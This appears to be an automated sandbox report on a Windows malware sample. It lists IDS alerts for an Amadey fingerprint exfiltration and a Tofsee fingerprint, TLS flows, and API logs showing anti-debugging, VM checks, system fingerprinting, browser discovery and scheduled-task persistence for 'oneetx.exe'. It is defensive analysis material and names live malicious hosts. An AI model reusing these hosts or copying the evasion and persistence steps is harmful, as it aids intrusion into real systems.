TCP 45.9.74.80:80 -> 192.168.56.101:49269	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 45.9.74.80:80 -> 192.168.56.101:49269	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 87.240.132.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49284 -> 45.9.74.80:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49248 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 141.95.126.89:443 -> 192.168.56.101:49198	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49198	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 141.95.126.89:443 -> 192.168.56.101:49206	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49206	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode
TCP 192.168.56.101:49260 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 141.95.126.89:443 -> 192.168.56.101:49195	2230002	SURICATA TLS invalid record type	Generic Protocol Command Decode
TCP 141.95.126.89:443 -> 192.168.56.101:49195	2230010	SURICATA TLS invalid record/traffic	Generic Protocol Command Decode

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49168 172.67.75.163:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
TLSv1 192.168.56.101:49164 172.67.193.129:443	C=US, O=Let's Encrypt, CN=E1	CN=ironhost.io	1f:0b:7a:47:6b:7f:71:b9:9c:82:0e:4f:f5:e8:7c:05:28:03:e7:8e
TLSv1 192.168.56.101:49186 172.67.214.144:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=sergejbukotko.com	f1:9c:9e:67:d8:1b:22:61:4a:4d:a0:fc:b3:45:84:76:9e:9d:2d:27
TLSv1 192.168.56.101:49175 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49188 172.67.197.101:443	C=US, O=Let's Encrypt, CN=E1	CN=preconcert.pw	60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64
TLSv1 192.168.56.101:49217 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49222 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49223 95.142.206.3:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49210 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49216 95.142.206.0:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49226 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49224 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49230 87.240.190.76:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49227 87.240.190.76:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49229 95.142.206.1:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49228 87.240.132.72:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49252 172.67.75.166:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49253 104.26.5.15:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5
TLSv1 192.168.56.101:49276 95.142.206.1:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com	bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24
TLSv1 192.168.56.101:49249 172.67.75.163:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
TLSv1 192.168.56.101:49266 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1 192.168.56.101:49275 87.240.132.78:443	C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2	C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com	6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09

Queries for the computername (40 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 6, 2023, 2:05 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (7 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0
IsDebuggerPresent Sept. 6, 2023, 2:04 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 6, 2023, 2:05 p.m.	buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Sept. 6, 2023, 2:05 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Sept. 6, 2023, 2:05 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Sept. 6, 2023, 2:05 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (41 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db400 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005db9c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dbcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dbcc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005dbbc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab1c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab240 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004ab440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004abd00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004abd00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004abbc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb370 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb3f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb870 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb930 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb9b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006bb6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0802f180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0802f180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 6, 2023, 2:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0802f180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (3 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 6, 2023, 2:04 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)

section	_RDATA
section	.vmp0
section	.vmp1
section	.vmp2

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	PNG
resource name	None

One or more processes crashed (50 out of 54 events)

Time & API	Arguments	Status
__exception__ Sept. 6, 2023, 2:04 p.m.	stacktrace: 0x7b7790 0x7b76c5 0x7b36da 0x7b3386 0x7b1b93 0x7b1b5c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72142652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7215264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72152e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x722074ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72207610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72291dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72291e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72291f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7229416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x727ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x729d7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x729d4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7b7829 registers.esp: 4648316 registers.edi: 39254792 registers.eax: 0 registers.ebp: 4648340 registers.edx: 6241376 registers.ebx: 39254812 registers.esi: 39255612 registers.ecx: 0	1
